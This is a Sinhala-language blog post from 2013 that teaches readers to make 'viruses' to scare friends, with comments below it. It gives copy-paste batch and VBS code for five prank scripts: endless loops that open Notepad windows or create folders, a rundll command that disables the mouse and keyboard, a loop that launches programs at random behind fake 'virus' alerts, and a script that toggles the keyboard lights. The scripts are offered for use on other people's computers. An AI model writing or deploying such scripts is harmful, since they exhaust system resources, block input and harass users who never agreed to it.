යාලුවෝ බය කරන්න Virus හදමුද ? Part 1

මම අද ඔයාලට දෙන්න යන්නේ විශේෂ දෙයක්...ඒ මොකද්ද දන්නවද ? ඔයාලගේ යාලුවෝ බය කරන්න  පුළුවන් Virus හදන හැටි කියා දෙන්නයි...දැන්  කියා දෙනවා ඒ වගේ බය කරන්න පුළුවන් Virus වර්ග 5 ක් හදන හැටි...දෙයක් තියෙනවා කියන්න මේවයෙන් ඔයාලගේ පරිගණකයට කිසිදු හානියක් සිදු වෙන්නේ නෑ...දැන් අපි බලමු ඒවගේ  Virus හදන්නේ කොහොමද කියලා...මම දැන් කියන්නම්..ඔයාලා පිළිවෙලට කරන්න...



1.මෙන්න පළමු Virus එක හදන හැටි


මෙම Virus එකෙන් වෙන්නේ Notpad 20,000 ක් එක දිගට විවෘත වෙන එකයි...


* මුලින්ම Desktop මත Right Click කර New කියන තැනට ගිහින් New Text Document කියන එක Click කරන්න...


ඊට පස්සේ New Text Document කියන එක විවෘත කර ගන්න...


දැන් ඔය පහළ තියෙන Code එක අකුරක් නෑරම Copy කරගෙන විවෘත කර ගත් Text Document එකේ Paste කරන්න...



@ECHO off
:top
START %SystemRoot%\system32
notepad.exe
GOTO top



* අන්තිමට Notpad එකේ File වලට ගිහින් Save As මත Click කර File Name කියන එකේ අවසානයට .bat කියලා ගහලා Save කරන්න...[උදාහරණයක්:- Notpad20000.bat]


මේක Open කලොත් නැති කර ගන්නේ Notpad පිටුපස තිබෙන CMD කියන Box එක Close කරලා...


2.මෙන්න දෙවන Virus එක හද හැටි


මෙම Virus එකෙන් වෙන්නේ එක දිගට Folder 1,000,000 විවෘත වෙන එකයි...



* මුලින්ම Text Document එකක් විවෘත කර ගන්න...


* පහළ තියෙන Code එක Copy කරගෙන විවෘත කර ගත් Text Document එකේ Paste කරන්න...


@echo off
:top
md %random%

goto top


*දැන් Save As වලට ගිහින් File Name කියන එකේ අවසානයට .bat කියලා ගහලා Save කරන්න...[උදාහරණයක්:- Folder.bat]


මේක Open කලොත් නැති කර ගන්නේ CMD කියන Box එක Close කරලා...



3.මෙන්න තුන්වන Virus එක හදන හැටි


මෙම Virus එකෙන් වෙන්නේ Mouse එක සහ Keyboard එකේ බලය නැති කරනවා...(Disable)


මුලින්ම Text Document එකක් විවෘත කර ගන්න...


* පහළ තියෙන Code එක Copy කරගෙන විවෘත කර ගත් Text Document එකේ Paste කරන්න...


rundll mouse,disable
rem made with Batch Virus Maker V.2
rundll keyboard,disable



* දැන් Save As වලට ගිහින් File Name කියන එකේ අවසානයට .bat කියලා ගහලා Save කරන්න...[උදාහරණයක්:- MouseAndKeyBoardDisabled.bat]


මේක Windows 7,Vista,8වල අත්හදා බලන්න එපා...මේක Windows XP විවෘතවල කලොත් නැති කර ගන්නේ පරිගණකය Restart කිරීමෙන් පසුවයි...


4.මෙන්න හතරවන Virus එක හදන හැටි


මෙම Virus එකෙන් වෙන්නේ Command Prompt සහPaint,Pinball වැනි ඒවා විවෘත වීමයි...


* මුලින්ම Text Document එකක් විවෘත කර ගන්න...


* පහළ තියෙන Code එක Copy කරගෙන විවෘත කර ගත් Text Document එකේ Paste කරන්න...


@echo off
msg * (YOUR COPMUTER FULL RUN VIRUS)
cls
msg * (YOUR COPMUTER FULL RUN VIRUS)
cls
msg * (YOUR COPMUTER FULL RUN VIRUS)
cls

begin
goto %random%
:1
start cmd.exe
goto begin
:2
start paint.exe
goto begin
:3
start pinball.exe
goto begin :4
start iexplore.exe
goto begin
:5
start explorer.exe
goto begin
:6
start iexplore.exe "supuntharaka.blogspot.com"
goto begin



* දැන් Save As වලට ගිහින් File Name කියන එකේ අවසානයට .bat කියලා ගහලා Save කරන්න...[උදාහරණයක්:- openexplore.bat]


මේක Open කලොත් නැති කර ගන්නේ CMD කියන Box එක Close කරලා...


5.මෙන්න පස්වන Virus එක හදන හැටි


මෙම Virus එකෙන් වෙන්නේ KeyBoard එකේ Light 3 නටන එකයි...


* මුලින්ම Text Document එකක් විවෘත කර ගන්න...


* පහළ තියෙන Code එක Copy කරගෙන විවෘත කර ගත් Text Document එකේ Paste කරන්න...


Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
wshshell.sendkeys "{NUMLOCK}"
wshshell.sendkeys "{SCROLLLOCK}"
loop



* දැන් Save As වලට ගිහින් File Name කියන එකේ අවසානයට .vbs කියලා ගහලා Save කරන්න...[උදාහරණයක්:- DanceKeyboard3 Light.vbs]


මේක Open කලොත් නැති කර ගන්නේ Widows Task Manager වල Proccess කියන එකේ තියෙන wscript කියන එක End Proccess කළාට පසුවයි...


දැනුම්දීමයි:- එක පාරක් දෙපාරක් කළාට අවුලක් නෑ...ගොඩක් කරන්න එපා Hard Disk එකටයි RAM එකටයි හොද නෑ...


දාලා බලලා හොද නම් Commenටුවක් දාන්න..මම තව ලිපියක් අරන් එන්නම්... අමතක කරන්න එපා මේ පිටුවට Like එකක් දාලා Member වෙලා යන්න...එහෙනම් මම යනවා...




                                              *ඔයාලට*
                                             සු ක්...!!!




මෙන්න Facebook Fan Page එක -


                                     facebook.com/supuntharaka.blogspot.com

Previous
Next Post »

3 අදහස්

Click here for අදහස්
Unknown
admin
July 11, 2013 at 5:17 PM ×

mata oyawa contact karaganna widiyak kiyanawada

Reply
avatar
බුවා
admin
August 1, 2013 at 9:58 PM ×

එලොවටත් නැති මෙලොවටත් නැති දේවල් දාල වෙලාවෙ, මිනිහෙක්ට වැඩක් ඇති දෙයක් දාපං බං.........................................
ඕවගෙන් වෙන්නෙ කොහෙවත් ඉන්න අහිංහසකයෙක් අමාරුවෙ දාල, සිඟිති ආතල් ගන්න සෙට් එකක් බිහි වෙන එක විතරයිනෙ.

Reply
avatar
August 6, 2013 at 9:23 AM ×

ehema hari naaa....untath e athal ganna puluwan nae...

Reply
avatar